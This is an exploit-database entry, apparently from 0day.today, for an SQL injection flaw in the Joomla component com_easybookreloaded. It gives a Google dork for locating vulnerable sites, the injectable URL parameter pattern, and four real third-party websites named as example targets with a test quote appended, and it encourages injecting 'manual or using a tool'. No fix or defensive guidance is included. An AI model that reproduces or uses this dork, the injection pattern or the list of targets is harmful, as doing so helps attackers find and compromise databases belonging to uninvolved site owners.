Joomla Component com_easybookreloaded Sql Injection Vulnerability

2013-07-31T00:00:00
ID 1337DAY-ID-21049
Type zdt
Reporter altiiever
Modified 2013-07-31T00:00:00

Description

you can inject manual or using a tool

                                        
                                            ////////////////////////////////////////////
// Title : Joomla Component com_easybookreloaded Sql Injection Vulnerability
// Date : 30 July 2013
// Version : 1.5x
// Author : Altiiever
// Google dork : inurl:"index.php?option=com_easybookreloaded"
// Download : Search Here -> http://extensions.joomla.org
////////////////////////////////////////////

Vuln
========
http://127.0.0.1/[PATH]index.php?option=com_easybookreloaded&view=[number]

http://127.0.0.1/[PATH]index.php?option=com_easybookreloaded&view=1[SQL]


Example
========
http://www.vololiberoband.it/home/index.php?option=com_easybookreloaded&view=50'
http://www.alucraegitimdernegi.com/index.php?option=com_easybookreloaded&view=easybookreloaded&Itemid=142'
http://www.siefkersawmill.com/index.php?option=com_easybookreloaded&view=easybookreloaded&Itemid=28'
http://ay-pen.com/index.php?option=com_easybookreloaded&view=easybookreloaded&Itemid=66'

#  0day.today [2018-04-08]  #